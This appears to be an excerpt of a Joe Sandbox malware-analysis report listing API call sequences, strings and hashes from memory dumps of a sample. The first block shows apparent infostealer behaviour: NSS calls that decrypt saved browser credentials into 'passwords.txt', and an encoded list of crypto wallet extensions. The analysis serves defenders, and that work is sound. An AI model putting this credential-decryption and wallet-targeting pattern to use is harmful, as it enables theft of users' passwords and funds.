                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,000573A4,0005680F), ref: 0002A9C1
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9D9
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9E1
                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9ED
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A9F7
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA09
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA15
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA1C
                                                                                                                                                                                          • StrStrA.SHLWAPI(0002B824,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA2D
                                                                                                                                                                                          • StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA47
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA5A
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA64
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573A8,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA70
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA7A
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573AC,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA86
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA93
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AA9B
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573B0,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAA7
                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAB7
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAC7
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AADA
                                                                                                                                                                                            • Part of subcall function 0002A7D8: _memset.LIBCMT ref: 0002A815
                                                                                                                                                                                            • Part of subcall function 0002A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A830
                                                                                                                                                                                            • Part of subcall function 0002A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0002A838
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A846
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A85A
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A89A
                                                                                                                                                                                            • Part of subcall function 0002A7D8: _memmove.LIBCMT ref: 0002A8BB
                                                                                                                                                                                            • Part of subcall function 0002A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002A8EC
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAE9
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573B4,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AAF5
                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB05
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB15
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB28
                                                                                                                                                                                            • Part of subcall function 0002A7D8: lstrcatA.KERNEL32(00056803,00056807,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8E5
                                                                                                                                                                                            • Part of subcall function 0002A7D8: lstrcatA.KERNEL32(00056803,0005680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0002AAE7), ref: 0002A8FB
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB37
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573B8,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB43
                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,000573BC,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB4F
                                                                                                                                                                                          • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002AB5F
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002AB7D
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0002ABAC
                                                                                                                                                                                          • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0002B824), ref: 0002ABB2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 0002AA0F
                                                                                                                                                                                          • p', xrefs: 0002A931
                                                                                                                                                                                          • passwords.txt, xrefs: 0002AB89
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                                                                                                          • String ID: passwords.txt$p'$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 2725232238-172412305
                                                                                                                                                                                          • Opcode ID: 0ea419e01ceeeb64a46876273c04b97e6439b83c0b3f32c64b664ab54dd4aa72
                                                                                                                                                                                          • Instruction ID: db0c3396ef29ffe985aedf3ab733011eba45ec96e51913e18b251419a60c0fc8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ea419e01ceeeb64a46876273c04b97e6439b83c0b3f32c64b664ab54dd4aa72
                                                                                                                                                                                          • Instruction Fuzzy Hash: D9713B32501219BBCF026BA4FC4EDDF7BB9EF4D305B424090FA09A7162DB7459859BB2
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C424730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C4244B2,6C49E21C,6C49F7F8), ref: 6C42473E
                                                                                                                                                                                            • Part of subcall function 6C424730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C42474A
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C4244BA
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C4244D2
                                                                                                                                                                                          • InitOnceExecuteOnce.KERNEL32(6C49F80C,6C41F240,?,?), ref: 6C42451A
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C42455C
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 6C424592
                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(6C49F770), ref: 6C4245A2
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000008), ref: 6C4245AA
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(00000018), ref: 6C4245BB
                                                                                                                                                                                          • InitOnceExecuteOnce.KERNEL32(6C49F818,6C41F240,?,?), ref: 6C424612
                                                                                                                                                                                          • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C424636
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(user32.dll), ref: 6C424644
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C42466D
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C42469F
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246AB
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246B2
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246B9
                                                                                                                                                                                          • VerSetConditionMask.NTDLL ref: 6C4246C0
                                                                                                                                                                                          • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C4246CD
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 6C4246F1
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C4246FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                          • String ID: GIl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                          • API String ID: 1702738223-2712608560
                                                                                                                                                                                          • Opcode ID: f402a31037f98f3637470cbf031552a67d8287cdcebec508eadd5945d6cb9fef
                                                                                                                                                                                          • Instruction ID: d6f22832b57be662674ca77d30227cc0caa3c2ebe6157dede5cc753953445b46
                                                                                                                                                                                          • Opcode Fuzzy Hash: f402a31037f98f3637470cbf031552a67d8287cdcebec508eadd5945d6cb9fef
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A6146B0A01364AFFF10EF60CC4AFA57BB8EB56348F148058F9449B641D7B98981CFA0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: EnterCriticalSection.KERNEL32(?,?,?,6C51F9C9,?,6C51F4DA,6C51F9C9,?,?,6C4E369A), ref: 6C4BCA7A
                                                                                                                                                                                            • Part of subcall function 6C4BCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4BCB26
                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,6C4CBE66), ref: 6C606E81
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C4CBE66), ref: 6C606E98
                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C66AAF9,?,?,?,?,?,?,6C4CBE66), ref: 6C606EC9
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C4CBE66), ref: 6C606ED2
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C4CBE66), ref: 6C606EF8
                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606F1F
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606F28
                                                                                                                                                                                          • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606F3D
                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C4CBE66), ref: 6C606FA6
                                                                                                                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6C66AAF9,00000000,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606FDB
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606FE4
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C606FEF
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C607014
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,6C4CBE66), ref: 6C60701D
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C4CBE66), ref: 6C607030
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C4CBE66), ref: 6C60705B
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C4CBE66), ref: 6C607079
                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C607097
                                                                                                                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C4CBE66), ref: 6C6070A0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                                                                                          • String ID: Pdl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                          • API String ID: 593473924-1199163173
                                                                                                                                                                                          • Opcode ID: db0566561f1749ec685317bae1dec3b1f87ca285f864c561c6a6882a2995f15a
                                                                                                                                                                                          • Instruction ID: 4128ac8a0b4a8b0e15a22dc072845fb36f53f9c48324d43c03b76b70ba9aa412
                                                                                                                                                                                          • Opcode Fuzzy Hash: db0566561f1749ec685317bae1dec3b1f87ca285f864c561c6a6882a2995f15a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7514FB1B0451157E31896305C51FFB3666DBA3318F144638E815B6BC1EB25E50E81EB
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_WrapKey), ref: 6C568E76
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C568EA4
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C568EB3
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C568EC9
                                                                                                                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C568EE5
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C568F17
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C568F29
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C568F3F
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C568F71
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C568F80
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C568F96
                                                                                                                                                                                          • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C568FB2
                                                                                                                                                                                          • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C568FCD
                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C569047
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$ndl
                                                                                                                                                                                          • API String ID: 1003633598-3549646474
                                                                                                                                                                                          • Opcode ID: dd6e90e446901d7e13354e928aa2f4b4cd98fd83cb8113449b1bc77b2c33bf2e
                                                                                                                                                                                          • Instruction ID: 894412652f2a90174822b23926e20c28731fec426c9c457a47d59fb740463830
                                                                                                                                                                                          • Opcode Fuzzy Hash: dd6e90e446901d7e13354e928aa2f4b4cd98fd83cb8113449b1bc77b2c33bf2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: A951A331A01115EBDB00DF52DD88F9A77B6AB8731CF448425F5086BE22D7309968CB9E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00044B1F
                                                                                                                                                                                          • __mtterm.LIBCMT ref: 00044B2B
                                                                                                                                                                                            • Part of subcall function 000447EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 000447FB
                                                                                                                                                                                            • Part of subcall function 000447EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00044815
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00044B41
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00044B4E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00044B5B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00044B68
                                                                                                                                                                                          • TlsAlloc.KERNEL32 ref: 00044BB8
                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 00044BD3
                                                                                                                                                                                          • __init_pointers.LIBCMT ref: 00044BDD
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044BEE
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044BFB
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044C08
                                                                                                                                                                                          • EncodePointer.KERNEL32 ref: 00044C15
                                                                                                                                                                                          • DecodePointer.KERNEL32(Function_0002496E), ref: 00044C36
                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 00044C4B
                                                                                                                                                                                          • DecodePointer.KERNEL32(00000000), ref: 00044C65
                                                                                                                                                                                          • __initptd.LIBCMT ref: 00044C70
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00044C77
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                          • API String ID: 3732613303-3819984048
                                                                                                                                                                                          • Opcode ID: 070270d598827d08530cbd364107937ed8c543390d9010b5007e8477ab67a178
                                                                                                                                                                                          • Instruction ID: 9f1433150c20f789538d83adadd6b4a72703bb212e5172acfba3635cacf3126c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 070270d598827d08530cbd364107937ed8c543390d9010b5007e8477ab67a178
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F317CB0C047529AFB526F79BD4961A3BF4EF44762B14012BE519B32B0DFBC9480CB54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594C50
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594C5B
                                                                                                                                                                                          • PR_smprintf.NSS3(6C66AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594C76
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594CAE
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C594CC9
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C594CF4
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C594D0B
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594D5E
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594D68
                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C594D85
                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C594DA2
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C594DB9
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C594DCF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                          • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                          • API String ID: 3756394533-2552752316
                                                                                                                                                                                          • Opcode ID: aa0eda1eb298f535d67b21b1086ffcff7717d0a068e14a70ed35234ee7531c2e
                                                                                                                                                                                          • Instruction ID: a96a2775ab6ee30fec4044bf346b90a154eed49ef83df8f392fe0b32ee28a8c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa0eda1eb298f535d67b21b1086ffcff7717d0a068e14a70ed35234ee7531c2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E417DB5900281ABDB119F259C846BB7A75AF9330CF094164EC2647B11E735ED14C7E7
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C576943
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C576957
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C576972
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C576983
                                                                                                                                                                                            • Part of subcall function 6C576910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5769AA
                                                                                                                                                                                            • Part of subcall function 6C576910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5769BE
                                                                                                                                                                                            • Part of subcall function 6C576910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5769D2
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5769DF
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C576A5B
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C576D8C
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576DC5
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576DD6
